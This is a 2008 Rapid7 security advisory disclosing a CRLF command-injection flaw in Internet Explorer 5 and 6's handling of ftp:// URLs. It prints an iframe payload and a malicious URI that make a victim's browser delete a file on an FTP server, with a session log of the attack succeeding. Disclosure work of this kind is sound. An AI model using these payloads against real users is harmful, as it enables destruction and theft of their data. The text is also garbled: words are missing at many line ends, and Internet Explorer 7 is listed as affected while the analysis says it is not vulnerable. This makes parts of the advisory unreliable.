                        Rapid7 Security Advisory
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Rapid7 Advisory R7-0032
Microsoft Internet Explorer FTP Command Injection Vulnerability

   Discovered: June 16th, 2007
   Published:  March 10, 2008
   Revision:   1.0

1. Affected system(s):

  o Internet Explorer 6 (all versions)
  o Internet Explorer 5 (all versions)

  o Internet Explorer 7

2. Summary

   Internet Explorer 5 and 6 are vulnerable to a File Transfer Protocol 
   CSRF-like command injection attack, whereby an attacker could execute 
   commands on an unsuspecting user's authenticated or unauthenticated FTP 
   An attacker could delete, rename, move, and possibly steal data and 
   malicious files to an FTP server under the attacker's control, on 
behalf of the

3. Vendor status and information

   Microsoft Corporation

   Microsoft was notified of this vulnerability on January 22, 2008.  They 

   acknowledged the vulnerability on February 7, 2008 and were given 30 
   to provide fix information.

4. Solution

   The vendor plans to release a patch for this issue in an upcoming 
   bulletin.  If possible, upgrade to Internet Explorer 7.

5. Detailed analysis

   The error occurs when a user visits a page containing a malicious FTP 
   Internet Explorer 5 and 6 decode and do not properly sanitize the 
supplied URL.
   It is possible to force Internet Explorer to chain FTP commands 
together by
   inserting URL encoded CRLF pairs after each command in the URL supplied 
by an
   HTML element.
         <iframe src="ftp://[EMAIL PROTECTED]:port/%0D%0ADELE%20foo.txt%0D%0A"/>
   Moreover, if two forward slashes are appended to the end of the 
   URL, Internet Explorer will attempt to use an already pre-authenticated
   connection established earlier by the user in the same browser session. 
   If the user has a pre-authenticated connection to an FTP server, an
   attacker, knowing the username and endpoint of that pre-authenticated
   connection, could piggyback on the user's session to execute arbitrary
   commands.  A pre-authenticated connection is not necessary to carry out 
   attack, as Internet Explorer will attempt an anonymous login if no 
username is
   specified in the URL.  If only the username is specified and no 
   forward slashes are appended to the string, Internet Explorer will send 
   username with a blank password (which may be sufficient for more 
   anonymous user accounts).  If no username is specified, Internet 
Explorer will
   attempt to login using the 'IEUser@' user.
   Successful execution of some attacks may depend on the command 
   strategy used by the target FTP server and the security configuration 
on the
   FTP server (for instance, most FTP servers do not allow PORT requests 
   endpoints which do not have the same address as the requesting client).
   In testing, Internet Explorer 6 SP2 required the two trailing forward
   slashes for the exploit to work correctly.  Internet Explorer 6 SP1 did 
   have this restriction.  Internet Explorer 7 is not vulnerable to this 
issue, as
   it correctly sanitizes the URL before attempting to make the request on 
the FTP
   Demonstration of the exploit piggybacking on a pre-authenticated 
   (malicious URL with two trailing forward slashes) with IE6 SP2:
   Malicious URI: ftp://[EMAIL PROTECTED]/%0D%0ADELE%20foo.txt%0D%0ACWD//
   --> Welcome banner
   220 debian FTP server (Version wu-2.6.2(2) Tue Mar 20 18:26:53 PST 
2007) ready.
   <-- IE6 Requests a user
   USER admin
   --> FTP server requires password
   331 Password required for admin.
   <-- IE6 supplies password.
   PASS admin
   --> FTP Server responds with successful login.
   230 User admin logged in.
   <-- IE6 tests 'OPTS UTF8' option.
   opts utf8 on
   --> Server responds with negative permanent reply to OPTS request.
   500 'OPTS utf8 on': command not understood.
   <-- IE6 asks for the present working directory.
   --> Server sends positive completion reply for PWD.
   257 "/home/admin" is current directory.
   <-- IE6 requests malicious FTP URI from an iframe in HTML doc
   CWD /home/admin/
   DELE foo.txt
   --> Server responds with positive completion for CWD
   250 CWD command successful.
   <-- IE6 sends a 'TYPE A' request
   --> Server responds with positive completion for DELE
   250 DELE command successful.
   <-- IE6 sends a NOOP.
   --> Server sends negative permanent response for last (invalid) 
   500 'CWD/': command not understood.
   And the file no longer exists.

6. Credit

   Discovered by Derek Abdine of Rapid7.
7. Contact Information

   Rapid7, LLC
   Web: http://www.rapid7.com
   Phone: +1 (617) 247-1717 

8. Disclaimer and Copyright

   Rapid7, LLC is not responsible for the misuse of the information
   provided in our security advisories. These advisories are a service
   to the professional security community. There are NO WARRANTIES with
   regard to this information. Any application or distribution of this
   information constitutes acceptance AS IS, at the user's own risk.
   This information is subject to change without notice.

   This advisory Copyright (C) 2008 Rapid7, LLC. Permission is hereby
   granted to redistribute this advisory, providing that no changes are
   made and that the copyright notices and disclaimers remain intact.

Rapid7 Security Research Team
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